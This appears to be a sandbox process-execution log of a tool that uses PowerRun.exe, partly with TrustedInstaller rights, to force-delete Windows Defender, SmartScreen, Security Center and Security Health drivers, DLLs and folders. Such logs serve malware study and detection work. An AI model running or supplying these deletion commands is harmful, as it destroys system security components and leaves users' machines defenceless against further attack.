PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\drivers\WdDevFlt.sys"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\drivers\SgrmAgent.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\drivers\WdBoot.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\drivers\WdDevFlt.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\drivers\WdFilter.sys"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\drivers\WdBoot.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\drivers\WdDevFlt.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\drivers\WdFilter.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\drivers\WdNisDrv.sys"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\drivers\WdDevFlt.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\drivers\WdNisDrv.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\drivers\WdFilter.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\smartscreen.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\smartscreen.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\drivers\WdFilter.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\drivers\WdNisDrv.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\smartscreen.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\smartscreen.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\drivers\WdNisDrv.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\smartscreen.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\smartscreenps.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\smartscreen.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\smartscreen.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\smartscreenps.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\wscadminui.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\smartscreen.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\smartscreenps.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\wscadminui.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\wscapi.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\smartscreenps.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\wscadminui.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\wscapi.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\wscisvif.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\wscadminui.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\wscapi.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\wscisvif.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\wscproxystub.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\wscapi.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\wscisvif.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\wscproxystub.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\System32\wscsvc.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\wscisvif.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\wscproxystub.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\System32\wscsvc.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\WinSxS\FileMaps\amd64_windows-defender*.manifest"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\wscproxystub.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\WinSxS\FileMaps\amd64_windows-defender*.manifest"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\System32\wscsvc.dll"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\WinSxS\FileMaps\wow64_windows-defender*.manifest"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\System32\wscsvc.dll"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\WinSxS\FileMaps\amd64_windows-defender*.manifest"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\WinSxS\FileMaps\wow64_windows-defender*.manifest"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\WinSxS\FileMaps\x86_windows-defender*.manifest"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\WinSxS\FileMaps\amd64_windows-defender*.manifest"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\WinSxS\FileMaps\wow64_windows-defender*.manifest"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\WinSxS\FileMaps\x86_windows-defender*.manifest"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c del /f /q "C:\Windows\system32\drivers\msseccore.sys"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\WinSxS\FileMaps\wow64_windows-defender*.manifest"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\WinSxS\FileMaps\x86_windows-defender*.manifest"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c del /f /q "C:\Windows\system32\drivers\msseccore.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Program Files (x86)\Windows Defender"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\WinSxS\FileMaps\x86_windows-defender*.manifest"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f /q "C:\Windows\system32\drivers\msseccore.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Program Files (x86)\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Program Files (x86)\Windows Defender Advanced Threat Protection"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del /f /q "C:\Windows\system32\drivers\msseccore.sys"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Program Files (x86)\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Program Files (x86)\Windows Defender Advanced Threat Protection"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Program Files\Windows Defender"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Program Files (x86)\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Program Files (x86)\Windows Defender Advanced Threat Protection"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Program Files\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Program Files\Windows Defender Advanced Threat Protection"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Program Files (x86)\Windows Defender Advanced Threat Protection"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Program Files\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Program Files\Windows Defender Advanced Threat Protection"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\ProgramData\Microsoft\Storage Health"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Program Files\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Program Files\Windows Defender Advanced Threat Protection"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\ProgramData\Microsoft\Storage Health"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\ProgramData\Microsoft\Windows Defender"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Program Files\Windows Defender Advanced Threat Protection"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\ProgramData\Microsoft\Storage Health"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\ProgramData\Microsoft\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\ProgramData\Microsoft\Storage Health"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\ProgramData\Microsoft\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\ProgramData\Microsoft\Windows Security Health"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\ProgramData\Microsoft\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\ProgramData\Microsoft\Windows Security Health"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\WINDOWS\System32\drivers\wd"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\ProgramData\Microsoft\Windows Security Health"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\WINDOWS\System32\drivers\wd"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\Containers\WindowsDefenderApplicationGuard.wim"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\WINDOWS\System32\drivers\wd"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\ProgramData\Microsoft\Windows Security Health"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\Containers\WindowsDefenderApplicationGuard.wim"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\WINDOWS\System32\drivers\wd"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\Containers\WindowsDefenderApplicationGuard.wim"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\GameBarPresenceWriter"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\GameBarPresenceWriter"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\Containers\WindowsDefenderApplicationGuard.wim"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\GameBarPresenceWriter"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\GameBarPresenceWriter"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\System32\HealthAttestationClient"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\System32\HealthAttestationClient"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\System32\SecurityHealth"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\System32\HealthAttestationClient"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\System32\SecurityHealth"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\System32\Sgrm"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\System32\HealthAttestationClient"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\System32\SecurityHealth"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\System32\Sgrm"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\System32\SecurityHealth"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\System32\Sgrm"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\System32\Tasks_Migrated\Microsoft\Windows\Windows Defender"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\System32\Sgrm"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\System32\Tasks_Migrated\Microsoft\Windows\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\System32\WebThreatDefSvc"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir /s /q "C:\Windows\System32\Tasks_Migrated\Microsoft\Windows\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" cmd.exe /c rmdir /s /q "C:\Windows\System32\WebThreatDefSvc"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe cmd.exe /c rmdir /s /q "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c rmdir /s /q "C:\Windows\System32\Tasks_Migrated\Microsoft\Windows\Windows Defender"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
